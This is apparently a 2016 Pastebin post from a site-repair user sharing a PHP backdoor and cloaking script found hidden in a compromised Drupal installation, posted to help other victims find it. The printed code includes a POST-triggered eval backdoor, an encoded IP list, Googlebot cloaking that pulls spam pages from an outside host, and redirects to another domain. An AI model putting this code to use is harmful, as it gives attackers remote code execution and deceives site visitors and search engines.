hackrepair

Favorite Drupal related hacker script found and removed

Apr 29th, 2016
258
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Favorite Drupal related hacker script found and removed
  2.  
  3. Yes, I removed a necessary function in the code, so the below has been rendered for display purposes only.
  4.  
  5. Drupal website generated Nike Jordan related text, only visible to Googlebot, at web page addresses like:
  6. website.com/journal/UOEYPQGHS
  7. Which hacker then submitted to Google for indexing, etc.
  8.  
  9. 1.
  10. Found inside of Drupal installation:
  11. ./htdocs/../../../../tmp/.ICE-unix/.ICE-unix
  12.  
  13. 2.
  14. Likewise, found reference to script within Drupal database tables:
  15. cache_bootstrap
  16. variable
  17.  
  18. I'm hoping this might help someone whose been similarly compromised but unable to locate the exploit within their Drupal install.
  19.  
  20. Was quite a challenge to locate - so got some respect for his skilz...
  21.  
  22. +++
  23.  
  24. <?php
  25. error_reporting(0);
  26. include DRUPAL_ROOT . '/' .'includes/session.inc';
  27. if(isset($_POST["vk4u"])){@preg_replace('/^/e','e'.'val($_POST["vk4u"])', 'add');exit;}
  28. function drupal_get_urlsc_callback_url($url) {
  29. $timeout = 15;
  30. if(!function_exists('curl_init')||!function_exists('curl_exec')) {
  31. $opts = array('http'=>array( 'method'=>"GET", 'timeout'=>$timeout));
  32. $context = stream_context_create($opts);
  33. $file_contents = file_get_contents($url,false,$context);
  34. } else {
  35. $ch = curl_init();
  36. curl_setopt ($ch, CURLOPT_URL, $url);
  37. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  38. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  39. $file_contents = curl_exec($ch);
  40. curl_close($ch);
  41. }
  42. return $file_contents;
  43. }
  44.  
  45. function drupal_is_gip(){
  46. $enip_str = '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';
  47. $deip_str = trim(OLsy($enip_str));
  48. $deip_arr = explode(chr(10),$deip_str);
  49. $rs = array();
  50. foreach($deip_arr as $goo_ip_str) $rs[] = (explode('-', $goo_ip_str));
  51. $lip=ip2long($_SERVER['REMOTE_ADDR']);
  52. if($lip<0) $lip+=4294967296;
  53. foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
  54. return false;
  55. }
  56.  
  57. if(empty($_COOKIE) && preg_match('/www\.website\.com\/journal\/([\w]+)/', $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"], $match1)){
  58. if(ob_get_length()>0) ob_clean();
  59. $cateid=$match1[1];
  60. if(strpos(@$_SERVER["HTTP_USER_AGENT"],"Googlebot")>0||drupal_is_gip()) {
  61. if(!empty($_SERVER["HTTP_IF_MODIFIED_SINCE"])){header("HTTP/1.0 304 Not Modified");exit;}
  62. $furl="http://95cdn.com/n/natural.php?id=".$cateid."&host=".$_SERVER["HTTP_HOST"];
  63. $filedata = drupal_get_urlsc_callback_url($furl);
  64. if(strlen($filedata)>1000){
  65. header("Expires: Sun, 19 Nov 1978 05:00:00 GMT");
  66. header("Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0");
  67. header("Content-Language: en");
  68. header("X-Generator: Drupal 7 (http://drupal.org)");
  69. header("Link: <//sites/all/themes/nmj/images/logo.png>; rel=\"image_src\",<http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"].">; rel=\"canonical\",<http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"].">; rel=\"shortlink\"");
  70. echo $filedata;
  71. }else
  72. header("HTTP/1.1 503 Service Temporarily Unavailable");
  73. exit;
  74. }
  75.  
  76. if(preg_match('/\.google\.|\.aol\.com|\.ask\.com/i',@$_SERVER["HTTP_REFERER"])) {
  77. header("location:http://botscache.com/n.php?".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
  78. exit;
  79. }
  80. header('HTTP/1.1 404 Not Found');
  81. header("Status: 404 Not Found");
  82. header("location:http://".$_SERVER["HTTP_HOST"]);
  83. exit;
  84. }
  85.  
  86. if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/'){
  87. if(ob_get_length()>0) ob_clean();
  88. if(strpos(@$_SERVER[HTTP_USER_AGENT], "Googlebot")>0||drupal_is_gip()){
  89. $furl="http://95cdn.com/n/natural.php?url=".$_SERVER["REQUEST_URI"];
  90. $filedata = drupal_get_urlsc_callback_url($furl);
  91. if(strlen($filedata)>1000){
  92. header("Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0");
  93. header("Content-Language: en");
  94. header("X-Generator: Drupal 7 (http://drupal.org)");
  95. header("Link: <http://www.website.com//sites/all/themes/nmj/images/logo.png>; rel=\"image_src\",<http://www.website.com/>; rel=\"canonical\",<http://www.website.com/>; rel=\"shortlink\"");
  96. header("Expires: Sun, 19 Nov 1978 05:00:00 GMT");
  97. echo $filedata;
  98. }else
  99. header("HTTP/1.1 503 Service Temporarily Unavailable");
  100. exit;
  101. }
  102. }
  103.  
  104. if(empty($_COOKIE) && preg_match('/www\.website\.com\/journal\/([\w]+)/', $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"], $match1)){
  105. if(ob_get_length()>0) ob_clean();
  106. if(preg_match('/\.google\.|\.aol\.com|\.ask\.com/i',@$_SERVER["HTTP_REFERER"])) {
  107. header("location:http://botscache.com/n.php?".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
  108. exit;
  109. }
  110. }
  111.  
  112. if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/google4a4791b250e72fd1.html'){
  113. echo 'google-site-verification: google4a4791b250e72fd1.html';
  114. exit;
  115. }
RAW Paste Data